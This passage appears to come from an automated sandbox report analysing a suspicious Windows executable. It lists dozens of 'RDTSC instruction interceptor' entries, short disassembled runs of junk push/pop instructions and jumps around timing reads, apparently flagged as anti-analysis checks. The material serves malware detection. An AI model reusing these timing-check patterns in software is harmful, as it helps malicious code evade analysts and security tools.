            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103817E second address: 1038182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1038182 second address: 1038186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1038186 second address: 103818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103818C second address: 10381B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF158DB3900h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FF158DB38FCh 0x00000016 je 00007FF158DB38F6h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10381B2 second address: 10381C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FF158548886h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10381C6 second address: 10381D0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10381D0 second address: 10381D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10381D5 second address: 10381EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FF158DB38F8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103836D second address: 1038371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1038371 second address: 1038377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1038377 second address: 10383B9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF158548896h 0x00000008 jmp 00007FF158548890h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007FF15854888Ah 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FF158548892h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103C294 second address: 103C2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF158DB391Eh 0x0000000f jmp 00007FF158DB3904h 0x00000014 jmp 00007FF158DB3904h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103C2DB second address: 103C2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158548893h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103C2F2 second address: 103C2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103C2F8 second address: 103C312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF15854888Dh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103CD44 second address: 103CD48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103CD48 second address: 103CD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF158548894h 0x0000000c jmp 00007FF15854888Eh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103CFF2 second address: 103D011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF158DB38F6h 0x0000000a popad 0x0000000b jmp 00007FF158DB3904h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103D011 second address: 103D02B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF15854888Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF158548886h 0x0000000f jc 00007FF158548886h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103D02B second address: 103D035 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF158DB38F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103D035 second address: 103D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF15854888Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103D047 second address: 103D050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 103D050 second address: 103D055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10419E7 second address: 10419ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1015B99 second address: 1015B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1015CD6 second address: 1015CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1015CDA second address: 1015CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1015DD9 second address: 1015DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1015DDD second address: 1015DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10163CD second address: 10163FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF158DB3908h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], esi 0x00000012 xor dword ptr [ebp+122D19ACh], eax 0x00000018 nop 0x00000019 push esi 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10166AA second address: 10166B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10166B1 second address: 10166DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF158DB38FDh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016A77 second address: 1016A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016A7B second address: 1016A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016A81 second address: 1016A86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016A86 second address: 1016AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF158DB38FFh 0x0000000e pushad 0x0000000f jp 00007FF158DB38F6h 0x00000015 jo 00007FF158DB38F6h 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e mov dword ptr [ebp+122D2114h], eax 0x00000024 push 0000001Eh 0x00000026 add dword ptr [ebp+122D2216h], edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016C36 second address: 1016C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016C3A second address: 1016C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016DBF second address: 1016DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016DC5 second address: 1016DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF158DB3905h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FF158DB38F8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016DEB second address: 1016E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1016E11 second address: 1016E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FF4EB5 second address: FF4EC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007FF158548886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FF4EC4 second address: FF4EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FF4EC9 second address: FF4ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF158548886h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FCC993 second address: FCC9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnp 00007FF158DB38F6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FF158DB38F6h 0x00000018 jmp 00007FF158DB38FAh 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FCC9B5 second address: FCC9C1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF158548886h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1042285 second address: 1042289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1042289 second address: 10422B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF158548886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FF1585488A1h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10422B6 second address: 10422BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10423E3 second address: 10423E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10423E9 second address: 10423F6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104257C second address: 1042580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1042580 second address: 1042595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3901h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1042595 second address: 10425BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF1585488A4h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1042748 second address: 104274E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C13A second address: 104C140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C140 second address: 104C14E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C14E second address: 104C16C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF158548892h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C16C second address: 104C18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FF158DB38F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF158DB3900h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C18B second address: 104C19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF15854888Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C19B second address: 104C19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104C19F second address: 104C1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104AFB4 second address: 104AFBA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104B10F second address: 104B15C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF158548896h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF158548896h 0x00000014 jmp 00007FF158548897h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104B15C second address: 104B162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104B162 second address: 104B16D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104B813 second address: 104B818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104B818 second address: 104B820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104BB02 second address: 104BB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FF158DB3908h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104BE5F second address: 104BE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 104BE64 second address: 104BE88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF158DB390Fh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051D0E second address: 1051D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF158548886h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051D25 second address: 1051D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3901h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051D3A second address: 1051D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF1585488A1h 0x0000000c je 00007FF158548886h 0x00000012 jmp 00007FF158548895h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051D61 second address: 1051D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF158DB3906h 0x00000008 ja 00007FF158DB38F6h 0x0000000e jl 00007FF158DB38F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105089E second address: 10508B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF158548886h 0x0000000a jmp 00007FF15854888Bh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10508B3 second address: 10508B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050A08 second address: 1050A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050E18 second address: 1050E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050E1E second address: 1050E2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050E2C second address: 1050E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050F86 second address: 1050FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF15854888Dh 0x0000000e jmp 00007FF158548897h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1050FB3 second address: 1050FC0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051108 second address: 1051112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051112 second address: 1051123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FF158DB38FCh 0x0000000b js 00007FF158DB38F6h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051123 second address: 1051128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1051128 second address: 105113B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF158DB38F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FF158DB38F6h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105113B second address: 105113F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105057A second address: 105058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF158DB38F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105058A second address: 105058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105058F second address: 10505A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FFh 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105554C second address: 1055550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 105AA3F second address: 105AA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
